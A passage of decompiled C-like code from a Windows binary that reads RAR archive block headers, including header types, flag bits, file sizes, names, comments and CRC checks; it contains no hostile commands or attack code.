                                                                                              				unsigned int _t531;
                                                                                              				signed int _t533;
                                                                                              				signed int _t545;
                                                                                              				char _t556;
                                                                                              				char _t557;
                                                                                              				signed int _t559;
                                                                                              				signed int _t560;
                                                                                              				signed int* _t576;
                                                                                              				signed int _t620;
                                                                                              				signed int _t621;
                                                                                              				signed int _t622;
                                                                                              				signed int _t644;
                                                                                              				signed int _t646;
                                                                                              				signed int _t650;
                                                                                              				signed int _t652;
                                                                                              				void* _t653;
                                                                                              				void* _t656;
                                                                                              				signed int _t659;
                                                                                              				signed int _t660;
                                                                                              				signed int _t662;
                                                                                              				signed int _t665;
                                                                                              				signed int _t666;
                                                                                              				void* _t667;
                                                                                              				signed int _t669;
                                                                                              				signed int _t670;
                                                                                              				signed int _t671;
                                                                                              				unsigned int _t676;
                                                                                              				signed int _t677;
                                                                                              				intOrPtr _t680;
                                                                                              				signed int _t681;
                                                                                              				signed int _t683;
                                                                                              				void* _t685;
                                                                                              				signed int _t694;
                                                                                              
                                                                                              				E0041A4DC(E00429562, _t685);
                                                                                              				E0041AAF0(0x2874);
                                                                                              				_push(_t677);
                                                                                              				_t509 = __ecx;
                                                                                              				E0040B736(_t685 - 0x48, __ecx);
                                                                                              				_t650 = 0;
                                                                                              				 *((intOrPtr*)(_t685 - 4)) = 0;
                                                                                              				if( *((char*)(__ecx + 0xb05c)) == 0) {
                                                                                              					L9:
                                                                                              					 *((char*)(_t685 - 0xe)) = 0;
                                                                                              					L11:
                                                                                              					E0040B4C8(_t685 - 0x48, _t650, 7);
                                                                                              					__eflags =  *((intOrPtr*)(_t685 - 0x34)) - _t650;
                                                                                              					if(__eflags == 0) {
                                                                                              						L5:
                                                                                              						E00401C37(_t509, _t644, _t696);
                                                                                              						L6:
                                                                                              						_t697 =  *((intOrPtr*)(_t685 - 0x48)) - _t650;
                                                                                              						if( *((intOrPtr*)(_t685 - 0x48)) != _t650) {
                                                                                              							_push( *((intOrPtr*)(_t685 - 0x48)));
                                                                                              							E0041A506(_t509, _t650, _t677, _t697);
                                                                                              						}
                                                                                              						_t334 = 0;
                                                                                              						L134:
                                                                                              						 *[fs:0x0] =  *((intOrPtr*)(_t685 - 0xc));
                                                                                              						return _t334;
                                                                                              					}
                                                                                              					 *(_t509 + 0x654c) = E0040B57A(_t685 - 0x48) & 0x0000ffff;
                                                                                              					 *(_t509 + 0x655c) = 0;
                                                                                              					_t677 = E0040B562(_t685 - 0x48) & 0x000000ff;
                                                                                              					_t340 = E0040B57A(_t685 - 0x48) & 0x0000ffff;
                                                                                              					 *(_t509 + 0x6554) = _t340;
                                                                                              					 *(_t509 + 0x655c) = _t340 >> 0x0000000e & 0x00000001;
                                                                                              					_t344 = E0040B57A(_t685 - 0x48) & 0x0000ffff;
                                                                                              					 *(_t509 + 0x6558) = _t344;
                                                                                              					 *(_t509 + 0x6550) = _t677;
                                                                                              					__eflags = _t344 - 7;
                                                                                              					if(__eflags >= 0) {
                                                                                              						_t677 = _t677 - 0x73;
                                                                                              						__eflags = _t677;
                                                                                              						_t652 = 3;
                                                                                              						if(_t677 == 0) {
                                                                                              							 *(_t509 + 0x6550) = 1;
                                                                                              						} else {
                                                                                              							_t677 = _t677 - 1;
                                                                                              							__eflags = _t677;
                                                                                              							if(_t677 == 0) {
                                                                                              								 *(_t509 + 0x6550) = 2;
                                                                                              							} else {
                                                                                              								_t677 = _t677 - 6;
                                                                                              								__eflags = _t677;
                                                                                              								if(_t677 == 0) {
                                                                                              									 *(_t509 + 0x6550) = _t652;
                                                                                              								} else {
                                                                                              									_t677 = _t677 - 1;
                                                                                              									__eflags = _t677;
                                                                                              									if(_t677 == 0) {
                                                                                              										 *(_t509 + 0x6550) = 5;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						_t521 =  *(_t509 + 0x6550);
                                                                                              						 *(_t509 + 0x6544) = _t521;
                                                                                              						__eflags = _t521 - 0x75;
                                                                                              						if(_t521 != 0x75) {
                                                                                              							__eflags = _t521 - 1;
                                                                                              							if(_t521 != 1) {
                                                                                              								L26:
                                                                                              								_t345 = _t344 + 0xfffffff9;
                                                                                              								__eflags = _t345;
                                                                                              								_push(_t345);
                                                                                              								L27:
                                                                                              								E0040B4C8(_t685 - 0x48, _t652);
                                                                                              								_t347 = E004010D4(_t509,  *(_t509 + 0x6558));
                                                                                              								asm("adc ecx, [ebx+0xb044]");
                                                                                              								 *((intOrPtr*)(_t509 + 0xb048)) = _t347 +  *((intOrPtr*)(_t509 + 0xb040));
                                                                                              								_t349 =  *(_t509 + 0x6550);
                                                                                              								 *((intOrPtr*)(_t509 + 0xb04c)) = 0;
                                                                                              								__eflags = _t349 - 1;
                                                                                              								if(__eflags == 0) {
                                                                                              									_t653 = _t509 + 0x6570;
                                                                                              									E00409B19(_t653);
                                                                                              									_t526 = 5;
                                                                                              									memcpy(_t653, _t509 + 0x654c, _t526 << 2);
                                                                                              									 *(_t509 + 0x6584) = E0040B57A(_t685 - 0x48);
                                                                                              									_t677 = E0040B5AF(_t685 - 0x48);
                                                                                              									_t530 = _t509 + 0x6578;
                                                                                              									_t531 =  *_t530;
                                                                                              									 *(_t509 + 0xb055) =  *_t530 & 0x00000001;
                                                                                              									 *(_t509 + 0xb054) = _t531 >> 0x00000003 & 0x00000001;
                                                                                              									 *(_t509 + 0xb057) = _t531 >> 0x00000002 & 0x00000001;
                                                                                              									 *(_t509 + 0xb05b) = _t531 >> 0x00000006 & 0x00000001;
                                                                                              									 *(_t509 + 0x6588) = _t677;
                                                                                              									 *(_t509 + 0xb05c) = _t531 >> 0x00000007 & 0x00000001;
                                                                                              									__eflags = _t677;
                                                                                              									if(_t677 != 0) {
                                                                                              										L114:
                                                                                              										_t369 = 1;
                                                                                              										__eflags = 1;
                                                                                              										L115:
                                                                                              										 *((char*)(_t509 + 0xb058)) = _t369;
                                                                                              										 *(_t509 + 0x658c) = _t531 >> 0x00000001 & 0x00000001;
                                                                                              										_t533 = _t531 >> 0x00000004 & 0x00000001;
                                                                                              										__eflags = _t533;
                                                                                              										 *(_t509 + 0xb059) = _t531 >> 0x00000008 & 0x00000001;
                                                                                              										 *(_t509 + 0xb05a) = _t533;
                                                                                              										L116:
                                                                                              										_t650 = 0;
                                                                                              										_t376 = E0040B6E6(_t685 - 0x48, 0);
                                                                                              										__eflags =  *(_t509 + 0x654c) - (_t376 & 0x0000ffff);
                                                                                              										if( *(_t509 + 0x654c) == (_t376 & 0x0000ffff)) {
                                                                                              											L128:
                                                                                              											__eflags =  *((intOrPtr*)(_t509 + 0xb04c)) -  *((intOrPtr*)(_t509 + 0xb044));
                                                                                              											if(__eflags > 0) {
                                                                                              												L131:
                                                                                              												_t680 =  *((intOrPtr*)(_t685 - 0x34));
                                                                                              												__eflags =  *((intOrPtr*)(_t685 - 0x48)) - _t650;
                                                                                              												if(__eflags != 0) {
                                                                                              													_push( *((intOrPtr*)(_t685 - 0x48)));
                                                                                              													E0041A506(_t509, _t650, _t680, __eflags);
                                                                                              												}
                                                                                              												_t334 = _t680;
                                                                                              												goto L134;
                                                                                              											}
                                                                                              											if(__eflags < 0) {
                                                                                              												goto L13;
                                                                                              											}
                                                                                              											__eflags =  *((intOrPtr*)(_t509 + 0xb048)) -  *((intOrPtr*)(_t509 + 0xb040));
                                                                                              											if(__eflags <= 0) {
                                                                                              												goto L13;
                                                                                              											}
                                                                                              											goto L131;
                                                                                              										}
                                                                                              										_t382 =  *(_t509 + 0x6550);
                                                                                              										__eflags = _t382 - 0x79;
                                                                                              										if(_t382 == 0x79) {
                                                                                              											goto L128;
                                                                                              										}
                                                                                              										__eflags = _t382 - 0x76;
                                                                                              										if(_t382 == 0x76) {
                                                                                              											goto L128;
                                                                                              										}
                                                                                              										__eflags = _t382 - 5;
                                                                                              										if(_t382 != 5) {
                                                                                              											L126:
                                                                                              											 *((char*)(_t509 + 0xb064)) = 1;
                                                                                              											E004062BA(0x4335ac, 3);
                                                                                              											__eflags =  *((char*)(_t685 - 0xe));
                                                                                              											if( *((char*)(_t685 - 0xe)) == 0) {
                                                                                              												goto L128;
                                                                                              											}
                                                                                              											E0040639F(4, _t509 + 0x1e, _t509 + 0x1e);
                                                                                              											 *((char*)(_t509 + 0xb065)) = 1;
                                                                                              											goto L6;
                                                                                              										}
                                                                                              										__eflags =  *(_t509 + 0x8906);
                                                                                              										if( *(_t509 + 0x8906) == 0) {
                                                                                              											goto L126;
                                                                                              										}
                                                                                              										E0040117B(_t685 - 0x58, _t644, _t509);
                                                                                              										 *((char*)(_t685 - 4)) = 1;
                                                                                              										_t388 =  *((intOrPtr*)( *_t509 + 0x10))();
                                                                                              										_t681 = 7;
                                                                                              										_t389 = _t388 - _t681;
                                                                                              										__eflags = _t389;
                                                                                              										asm("sbb edx, edi");
                                                                                              										 *((intOrPtr*)( *_t509 + 0xc))(_t389, _t644, 0);
                                                                                              										 *((char*)(_t685 - 0xd)) = 1;
                                                                                              										do {
                                                                                              											_t392 = E00408C2F(_t509);
                                                                                              											__eflags = _t392;
                                                                                              											if(_t392 != 0) {
                                                                                              												 *((char*)(_t685 - 0xd)) = 0;
                                                                                              											}
                                                                                              											_t681 = _t681 - 1;
                                                                                              											__eflags = _t681;
                                                                                              										} while (_t681 != 0);
                                                                                              										 *((char*)(_t685 - 4)) = 0;
                                                                                              										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t685 - 0x58)))) + 0xc))( *((intOrPtr*)(_t685 - 0x50)),  *(_t685 - 0x4c), _t650);
                                                                                              										__eflags =  *((char*)(_t685 - 0xd));
                                                                                              										if( *((char*)(_t685 - 0xd)) != 0) {
                                                                                              											goto L128;
                                                                                              										}
                                                                                              										goto L126;
                                                                                              									}
                                                                                              									_t369 = 0;
                                                                                              									__eflags =  *(_t509 + 0x6584);
                                                                                              									if( *(_t509 + 0x6584) == 0) {
                                                                                              										goto L115;
                                                                                              									}
                                                                                              									goto L114;
                                                                                              								}
                                                                                              								if(__eflags <= 0) {
                                                                                              									L110:
                                                                                              									__eflags =  *(_t509 + 0x6554) & 0x00008000;
                                                                                              									if(( *(_t509 + 0x6554) & 0x00008000) != 0) {
                                                                                              										 *((intOrPtr*)(_t509 + 0xb048)) =  *((intOrPtr*)(_t509 + 0xb048)) + E0040B5AF(_t685 - 0x48);
                                                                                              										asm("adc dword [ebx+0xb04c], 0x0");
                                                                                              									}
                                                                                              									goto L116;
                                                                                              								}
                                                                                              								__eflags = _t349 - _t652;
                                                                                              								if(_t349 <= _t652) {
                                                                                              									__eflags = _t349 - 2;
                                                                                              									 *((char*)(_t685 - 0xd)) = _t349 == 2;
                                                                                              									__eflags =  *((char*)(_t685 - 0xd));
                                                                                              									_t396 = _t509 + 0x65e8;
                                                                                              									if( *((char*)(_t685 - 0xd)) == 0) {
                                                                                              										_t396 = _t509 + 0x8928;
                                                                                              									}
                                                                                              									_t656 = _t396;
                                                                                              									 *(_t685 - 0x14) = _t396;
                                                                                              									E00409B44(_t656, 0);
                                                                                              									_t545 = 5;
                                                                                              									memcpy(_t656, _t509 + 0x654c, _t545 << 2);
                                                                                              									_t683 =  *(_t685 - 0x14);
                                                                                              									 *(_t683 + 0x1088) =  *(_t683 + 8) & 0x00000001;
                                                                                              									_t401 =  *(_t683 + 8);
                                                                                              									 *(_t683 + 0x1089) = _t401 >> 0x00000001 & 0x00000001;
                                                                                              									 *(_t683 + 0x108b) = _t401 >> 0x00000002 & 0x00000001;
                                                                                              									__eflags =  *((char*)(_t685 - 0xd));
                                                                                              									 *(_t683 + 0x1090) = _t401 >> 0x0000000a & 0x00000001;
                                                                                              									if( *((char*)(_t685 - 0xd)) == 0) {
                                                                                              										L40:
                                                                                              										_t556 = 0;
                                                                                              										__eflags = 0;
                                                                                              										goto L41;
                                                                                              									} else {
                                                                                              										__eflags = _t401 & 0x00000010;
                                                                                              										if((_t401 & 0x00000010) == 0) {
                                                                                              											goto L40;
                                                                                              										}
                                                                                              										_t556 = 1;
                                                                                              										L41:
                                                                                              										__eflags =  *((char*)(_t685 - 0xd));
                                                                                              										_t677 =  *(_t685 - 0x14);
                                                                                              										 *((char*)(_t677 + 0x10e0)) = _t556;
                                                                                              										if( *((char*)(_t685 - 0xd)) != 0) {
                                                                                              											L44:
                                                                                              											_t557 = 0;
                                                                                              											__eflags = 0;
                                                                                              											L45:
                                                                                              											 *((char*)(_t677 + 0x10ea)) = _t557;
                                                                                              											_t559 = _t401 & 0x000000e0;
                                                                                              											__eflags = _t559 - 0xe0;
                                                                                              											_t560 = _t559 & 0xffffff00 | _t559 == 0x000000e0;
                                                                                              											 *(_t677 + 0x10e1) = _t560;
                                                                                              											__eflags = _t560;
                                                                                              											if(_t560 == 0) {
                                                                                              												_t646 = 0x10000 << (_t401 >> 0x00000005 & 0x00000007);
                                                                                              												__eflags = 0x10000;
                                                                                              											} else {
                                                                                              												_t646 = 0;
                                                                                              											}
                                                                                              											 *(_t677 + 0x10e2) = _t401 >> 0x00000003 & 0x00000001;
                                                                                              											 *(_t677 + 0x10e4) = _t646;
                                                                                              											 *(_t677 + 0x10e3) = _t401 >> 0x0000000b & 0x00000001;
                                                                                              											 *((intOrPtr*)(_t677 + 0x14)) = E0040B5AF(_t685 - 0x48);
                                                                                              											 *(_t685 - 0x1c) = E0040B5AF(_t685 - 0x48);
                                                                                              											_t406 = E0040B562(_t685 - 0x48);
                                                                                              											_t659 = 2;
                                                                                              											 *((char*)(_t677 + 0x18)) = _t406;
                                                                                              											 *(_t677 + 0x1060) = _t659;
                                                                                              											 *((intOrPtr*)(_t677 + 0x1064)) = E0040B5AF(_t685 - 0x48);
                                                                                              											 *(_t685 - 0x20) = E0040B5AF(_t685 - 0x48);
                                                                                              											 *(_t677 + 0x19) = E0040B562(_t685 - 0x48);
                                                                                              											 *((char*)(_t677 + 0x1a)) = E0040B562(_t685 - 0x48) - 0x30;
                                                                                              											 *(_t685 - 0x14) = E0040B57A(_t685 - 0x48) & 0x0000ffff;
                                                                                              											_t414 = E0040B5AF(_t685 - 0x48);
                                                                                              											 *(_t677 + 0x108c) =  *(_t677 + 0x108c) & 0x00000000;
                                                                                              											__eflags =  *((char*)(_t677 + 0x108b));
                                                                                              											 *(_t677 + 0x1c) = _t414;
                                                                                              											if( *((char*)(_t677 + 0x108b)) == 0) {
                                                                                              												L57:
                                                                                              												_t644 =  *((intOrPtr*)(_t677 + 0x18));
                                                                                              												 *(_t677 + 0x10ec) = _t659;
                                                                                              												__eflags = _t644 - 3;
                                                                                              												if(_t644 == 3) {
                                                                                              													L61:
                                                                                              													 *(_t677 + 0x10ec) = 1;
                                                                                              													L62:
                                                                                              													_t660 = 0;
                                                                                              													_t576 = _t677 + 0x10f0;
                                                                                              													 *_t576 = 0;
                                                                                              													__eflags = _t644 - 3;
                                                                                              													if(_t644 == 3) {
                                                                                              														_t644 = _t414 & 0x0000f000;
                                                                                              														__eflags = _t644 - 0xa000;
                                                                                              														if(_t644 == 0xa000) {
                                                                                              															 *_t576 = 1;
                                                                                              															__eflags = 0;
                                                                                              															 *((short*)(_t677 + 0x10f4)) = 0;
                                                                                              														}
                                                                                              													}
                                                                                              													__eflags =  *((char*)(_t685 - 0xd));
                                                                                              													if( *((char*)(_t685 - 0xd)) != 0) {
                                                                                              														L68:
                                                                                              														_t415 = 0;
                                                                                              														__eflags = 0;
                                                                                              														goto L69;
                                                                                              													} else {
                                                                                              														__eflags = _t414;
                                                                                              														if(_t414 >= 0) {
                                                                                              															goto L68;
                                                                                              														}
                                                                                              														_t415 = 1;
                                                                                              														L69:
                                                                                              														 *((char*)(_t677 + 0x10e8)) = _t415;
                                                                                              														_t418 =  *(_t677 + 8) >> 0x00000008 & 0x00000001;
                                                                                              														__eflags = _t418;
                                                                                              														 *(_t677 + 0x10e9) = _t418;
                                                                                              														if(_t418 == 0) {
                                                                                              															__eflags =  *(_t685 - 0x1c) - 0xffffffff;
                                                                                              															 *((intOrPtr*)(_t685 - 0x18)) = _t660;
                                                                                              															_t131 =  *(_t685 - 0x1c) == 0xffffffff;
                                                                                              															__eflags = _t131;
                                                                                              															_t419 = _t418 & 0xffffff00 | _t131;
                                                                                              															L75:
                                                                                              															 *(_t677 + 0x108a) = _t419;
                                                                                              															_t420 = E0041ABD0(_t660, 0, 0, 1);
                                                                                              															asm("adc edx, edi");
                                                                                              															 *((intOrPtr*)(_t677 + 0x1048)) = _t420 +  *((intOrPtr*)(_t677 + 0x14));
                                                                                              															 *(_t677 + 0x104c) = _t644;
                                                                                              															_t422 = E0041ABD0( *((intOrPtr*)(_t685 - 0x18)), 0, 0, 1);
                                                                                              															asm("adc edx, ecx");
                                                                                              															 *(_t677 + 0x1050) = _t422 +  *(_t685 - 0x1c);
                                                                                              															 *(_t677 + 0x1054) = _t644;
                                                                                              															__eflags =  *(_t677 + 0x108a);
                                                                                              															if( *(_t677 + 0x108a) != 0) {
                                                                                              																 *(_t677 + 0x1050) = 0x7fffffff;
                                                                                              																 *(_t677 + 0x1054) = 0x7fffffff;
                                                                                              															}
                                                                                              															_t662 = 0x1fff;
                                                                                              															__eflags =  *(_t685 - 0x14) - 0x1fff;
                                                                                              															if( *(_t685 - 0x14) < 0x1fff) {
                                                                                              																_t662 =  *(_t685 - 0x14);
                                                                                              															}
                                                                                              															E0040B696(_t685 - 0x48, _t685 - 0x2880, _t662);
                                                                                              															__eflags =  *((char*)(_t685 - 0xd));
                                                                                              															 *((char*)(_t685 + _t662 - 0x2880)) = 0;
                                                                                              															if( *((char*)(_t685 - 0xd)) == 0) {
                                                                                              																 *((intOrPtr*)(_t685 - 0x18)) = _t677 + 0x20;
                                                                                              																E00411B3C(_t685 - 0x2880, _t677 + 0x20, 0x800);
                                                                                              																_t665 =  *((intOrPtr*)(_t677 + 0xc)) -  *(_t685 - 0x14) - 0x20;
                                                                                              																__eflags =  *(_t677 + 8) & 0x00000400;
                                                                                              																if(( *(_t677 + 8) & 0x00000400) != 0) {
                                                                                              																	_t665 = _t665 - 8;
                                                                                              																	__eflags = _t665;
                                                                                              																}
                                                                                              																__eflags = _t665;
                                                                                              																if(_t665 > 0) {
                                                                                              																	E00401C1D(_t677 + 0x1020, _t665);
                                                                                              																	E0040B696(_t685 - 0x48,  *((intOrPtr*)(_t677 + 0x1020)), _t665);
                                                                                              																	_t461 = E0041AA21( *((intOrPtr*)(_t685 - 0x18)), 0x42a494);
                                                                                              																	__eflags = _t461;
                                                                                              																	if(_t461 == 0) {
                                                                                              																		_t644 =  *( *((intOrPtr*)(_t677 + 0x1020)) + 9) & 0x000000ff;
                                                                                              																		 *(_t509 + 0x652c) =  *(_t509 + 0x652c) & 0x00000000;
                                                                                              																		 *((intOrPtr*)(_t509 + 0x6528)) = E0041ABD0((((( *( *((intOrPtr*)(_t677 + 0x1020)) + 0xb) & 0x000000ff) << 8) + ( *( *((intOrPtr*)(_t677 + 0x1020)) + 0xa) & 0x000000ff) << 8) + _t644 << 8) + ( *( *((intOrPtr*)(_t677 + 0x1020)) + 8) & 0x000000ff),  *(_t509 + 0x652c), 0x200, 0);
                                                                                              																		 *(_t509 + 0x652c) = _t644;
                                                                                              																		 *((intOrPtr*)(_t685 - 0x28)) =  *((intOrPtr*)( *_t509 + 0x10))();
                                                                                              																		 *(_t685 - 0x24) = _t644;
                                                                                              																		_t468 = E00410B07( *((intOrPtr*)(_t509 + 0x6528)),  *(_t509 + 0x652c), _t467, _t644);
                                                                                              																		 *(_t509 + 0x6530) = _t468;
                                                                                              																		_t670 = _t468;
                                                                                              																		_t469 = E0041AB20( *((intOrPtr*)(_t685 - 0x28)),  *(_t685 - 0x24), 0xc8, 0);
                                                                                              																		asm("adc edx, [ebx+0x652c]");
                                                                                              																		_t471 = E00410B07(_t469 +  *((intOrPtr*)(_t509 + 0x6528)), _t644,  *((intOrPtr*)(_t685 - 0x28)),  *(_t685 - 0x24));
                                                                                              																		__eflags = _t471 - _t670;
                                                                                              																		if(_t471 > _t670) {
                                                                                              																			_t671 = _t670 + 1;
                                                                                              																			__eflags = _t671;
                                                                                              																			 *(_t509 + 0x6530) = _t671;
                                                                                              																		}
                                                                                              																	}
                                                                                              																}
                                                                                              																_t429 = E0041AA21( *((intOrPtr*)(_t685 - 0x18)), "CMT");
                                                                                              																__eflags = _t429;
                                                                                              																if(_t429 == 0) {
                                                                                              																	 *((char*)(_t509 + 0xb056)) = 1;
                                                                                              																}
                                                                                              															} else {
                                                                                              																__eflags =  *(_t677 + 8) & 0x00000200;
                                                                                              																if(( *(_t677 + 8) & 0x00000200) == 0) {
                                                                                              																	_t472 = _t677 + 0x20;
                                                                                              																	_t609 = 0;
                                                                                              																	__eflags = 0;
                                                                                              																	 *((intOrPtr*)(_t685 - 0x18)) = _t472;
                                                                                              																	 *_t472 = 0;
                                                                                              																} else {
                                                                                              																	E0040612E(_t685 - 0x5c);
                                                                                              																	_t481 = E0041AA60(_t685 - 0x2880);
                                                                                              																	 *((intOrPtr*)(_t685 - 0x18)) = _t677 + 0x20;
                                                                                              																	_t609 = _t685 - 0x5c;
                                                                                              																	E0040613F(_t685 - 0x5c, _t685 - 0x2880, _t685 + _t481 + 1 - 0x2880,  *(_t685 - 0x14) - _t481 + 1, _t677 + 0x20, 0x800);
                                                                                              																}
                                                                                              																E00410B32(_t685 - 0x2880, _t685 - 0x880, 0x800);
                                                                                              																E0040A386(_t609, _t685 - 0x880,  *((intOrPtr*)(_t685 - 0x18)),  *((intOrPtr*)(_t685 - 0x18)), 0x800);
                                                                                              																E00401A7E(_t509, _t677);
                                                                                              															}
                                                                                              															__eflags =  *(_t677 + 8) & 0x00000400;
                                                                                              															if(( *(_t677 + 8) & 0x00000400) != 0) {
                                                                                              																E0040B696(_t685 - 0x48, _t677 + 0x1091, 8);
                                                                                              															}
                                                                                              															E00411650( *(_t685 - 0x20));
                                                                                              															__eflags =  *(_t677 + 8) & 0x00001000;
                                                                                              															if(( *(_t677 + 8) & 0x00001000) == 0) {
                                                                                              																L107:
                                                                                              																 *((intOrPtr*)(_t509 + 0xb048)) =  *((intOrPtr*)(_t509 + 0xb048)) +  *((intOrPtr*)(_t677 + 0x1048));
                                                                                              																asm("adc [ebx+0xb04c], eax");
                                                                                              																 *(_t685 - 0x24) =  *(_t677 + 0x10e2);
                                                                                              																_t434 = E0040B6E6(_t685 - 0x48,  *(_t685 - 0x24));
                                                                                              																__eflags =  *_t677 - (_t434 & 0x0000ffff);
                                                                                              																if( *_t677 != (_t434 & 0x0000ffff)) {
                                                                                              																	 *((char*)(_t509 + 0xb064)) = 1;
                                                                                              																	E004062BA(0x4335ac, 1);
                                                                                              																	__eflags =  *((char*)(_t685 - 0xe));
                                                                                              																	if( *((char*)(_t685 - 0xe)) == 0) {
                                                                                              																		E0040639F(0x1a, _t509 + 0x1e,  *((intOrPtr*)(_t685 - 0x18)));
                                                                                              																	}
                                                                                              																}
                                                                                              																goto L116;
                                                                                              															} else {
                                                                                              																_t439 = E0040B57A(_t685 - 0x48);
                                                                                              																 *(_t685 - 0x4c) =  *(_t685 - 0x4c) & 0x00000000;
                                                                                              																_t217 = _t685 - 0x14;
                                                                                              																 *_t217 =  *(_t685 - 0x14) & 0x00000000;
                                                                                              																__eflags =  *_t217;
                                                                                              																 *((intOrPtr*)(_t685 - 0x58)) = _t509 + 0x7618;
                                                                                              																 *((intOrPtr*)(_t685 - 0x54)) = _t509 + 0x7620;
                                                                                              																 *((intOrPtr*)(_t685 - 0x50)) = _t509 + 0x7628;
                                                                                              																 *(_t685 - 0x24) = _t439 & 0xffff;
                                                                                              																 *(_t685 - 0x1c) = 0xc;
                                                                                              																do {
                                                                                              																	_t666 =  *(_t685 +  *(_t685 - 0x14) * 4 - 0x58);
                                                                                              																	_t444 =  *(_t685 - 0x24) >>  *(_t685 - 0x1c);
                                                                                              																	 *(_t685 - 0x20) = _t444;
                                                                                              																	__eflags = _t444 & 0x00000008;
                                                                                              																	if((_t444 & 0x00000008) == 0) {
                                                                                              																		goto L106;
                                                                                              																	}
                                                                                              																	__eflags = _t666;
                                                                                              																	if(_t666 == 0) {
                                                                                              																		goto L106;
                                                                                              																	}
                                                                                              																	__eflags =  *(_t685 - 0x14);
                                                                                              																	if( *(_t685 - 0x14) != 0) {
                                                                                              																		E00411650(E0040B5AF(_t685 - 0x48));
                                                                                              																	}
                                                                                              																	E004113F1(_t666, _t685 - 0x80);
                                                                                              																	__eflags =  *(_t685 - 0x20) & 0x00000004;
                                                                                              																	if(( *(_t685 - 0x20) & 0x00000004) != 0) {
                                                                                              																		_t242 = _t685 - 0x6c;
                                                                                              																		 *_t242 =  *(_t685 - 0x6c) + 1;
                                                                                              																		__eflags =  *_t242;
                                                                                              																	}
                                                                                              																	 *(_t685 - 0x68) =  *(_t685 - 0x68) & 0x00000000;
                                                                                              																	_t448 =  *(_t685 - 0x20) & 0x00000003;
                                                                                              																	__eflags = _t448;
                                                                                              																	if(_t448 <= 0) {
                                                                                              																		L105:
                                                                                              																		E00411541( *(_t685 +  *(_t685 - 0x14) * 4 - 0x58), _t685 - 0x80);
                                                                                              																	} else {
                                                                                              																		_t667 = 3;
                                                                                              																		_t669 = _t667 - _t448 << 3;
                                                                                              																		__eflags = _t669;
                                                                                              																		 *(_t685 - 0x20) = _t448;
                                                                                              																		do {
                                                                                              																			_t454 = (E0040B562(_t685 - 0x48) & 0x000000ff) << _t669;
                                                                                              																			_t669 = _t669 + 8;
                                                                                              																			 *(_t685 - 0x68) =  *(_t685 - 0x68) | _t454;
                                                                                              																			_t251 = _t685 - 0x20;
                                                                                              																			 *_t251 =  *(_t685 - 0x20) - 1;
                                                                                              																			__eflags =  *_t251;
                                                                                              																		} while ( *_t251 != 0);
                                                                                              																		goto L105;
                                                                                              																	}
                                                                                              																	L106:
                                                                                              																	 *(_t685 - 0x1c) =  *(_t685 - 0x1c) - 4;
                                                                                              																	 *(_t685 - 0x14) =  *(_t685 - 0x14) + 1;
                                                                                              																	__eflags =  *(_t685 - 0x1c) - 0xfffffffc;
                                                                                              																} while ( *(_t685 - 0x1c) > 0xfffffffc);
                                                                                              																goto L107;
                                                                                              															}
                                                                                              														}
                                                                                              														_t660 = E0040B5AF(_t685 - 0x48);
                                                                                              														_t488 = E0040B5AF(_t685 - 0x48);
                                                                                              														__eflags =  *(_t685 - 0x1c) - 0xffffffff;
                                                                                              														 *((intOrPtr*)(_t685 - 0x18)) = _t488;
                                                                                              														if( *(_t685 - 0x1c) != 0xffffffff) {
                                                                                              															L73:
                                                                                              															_t419 = 0;
                                                                                              															goto L75;
                                                                                              														}
                                                                                              														__eflags = _t488 - 0xffffffff;
                                                                                              														if(_t488 != 0xffffffff) {
                                                                                              															goto L73;
                                                                                              														}
                                                                                              														_t419 = 1;
                                                                                              														goto L75;
                                                                                              													}
                                                                                              												}
                                                                                              												__eflags = _t644 - 5;
                                                                                              												if(_t644 == 5) {
                                                                                              													goto L61;
                                                                                              												}
                                                                                              												__eflags = _t644 - 6;
                                                                                              												if(_t644 < 6) {
                                                                                              													 *(_t677 + 0x10ec) =  *(_t677 + 0x10ec) & 0x00000000;
                                                                                              												}
                                                                                              												goto L62;
                                                                                              											} else {
                                                                                              												_t620 = ( *(_t677 + 0x19) & 0x000000ff) - 0xd;
                                                                                              												__eflags = _t620;
                                                                                              												if(_t620 == 0) {
                                                                                              													 *(_t677 + 0x108c) = 1;
                                                                                              													goto L57;
                                                                                              												}
                                                                                              												_t621 = _t620 - _t659;
                                                                                              												__eflags = _t621;
                                                                                              												if(_t621 == 0) {
                                                                                              													 *(_t677 + 0x108c) = _t659;
                                                                                              													goto L57;
                                                                                              												}
                                                                                              												_t622 = _t621 - 5;
                                                                                              												__eflags = _t622;
                                                                                              												if(_t622 == 0) {
                                                                                              													L54:
                                                                                              													 *(_t677 + 0x108c) = 3;
                                                                                              													goto L57;
                                                                                              												}
                                                                                              												__eflags = _t622 == 6;
                                                                                              												if(_t622 == 6) {
                                                                                              													goto L54;
                                                                                              												}
                                                                                              												 *(_t677 + 0x108c) = 4;
                                                                                              												goto L57;
                                                                                              											}
                                                                                              										}
                                                                                              										__eflags = _t401 & 0x00000010;
                                                                                              										if((_t401 & 0x00000010) == 0) {
                                                                                              											goto L44;
                                                                                              										}
                                                                                              										_t557 = 1;
                                                                                              										goto L45;
                                                                                              									}
                                                                                              								}
                                                                                              								__eflags = _t349 - 5;
                                                                                              								if(_t349 != 5) {
                                                                                              									goto L110;
                                                                                              								} else {
                                                                                              									_push(_t349);
                                                                                              									_t492 = memcpy(_t509 + 0x88e8, _t509 + 0x654c, 0 << 2);
                                                                                              									_t676 =  *_t492;
                                                                                              									 *(_t509 + 0x8904) =  *_t492 & 0x00000001;
                                                                                              									 *(_t509 + 0x8906) = _t676 >> 0x00000002 & 0x00000001;
                                                                                              									_t495 = _t676 >> 0x00000001 & 0x00000001;
                                                                                              									_t677 = _t509 + 0x8907;
                                                                                              									 *(_t509 + 0x8905) = _t495;
                                                                                              									 *_t677 = _t676 >> 0x00000003 & 0x00000001;
                                                                                              									__eflags = _t495;
                                                                                              									if(_t495 != 0) {
                                                                                              										 *((intOrPtr*)(_t509 + 0x88fc)) = E0040B5AF(_t685 - 0x48);
                                                                                              									}
                                                                                              									__eflags =  *_t677;
                                                                                              									if( *_t677 != 0) {
                                                                                              										_t497 = E0040B57A(_t685 - 0x48) & 0x0000ffff;
                                                                                              										 *(_t509 + 0x8900) = _t497;
                                                                                              										 *(_t509 + 0xb078) = _t497;
                                                                                              									}
                                                                                              									goto L116;
                                                                                              								}
                                                                                              							}
                                                                                              							__eflags =  *(_t509 + 0x6554) & 0x00000002;
                                                                                              							if(( *(_t509 + 0x6554) & 0x00000002) != 0) {
                                                                                              								goto L23;
                                                                                              							}
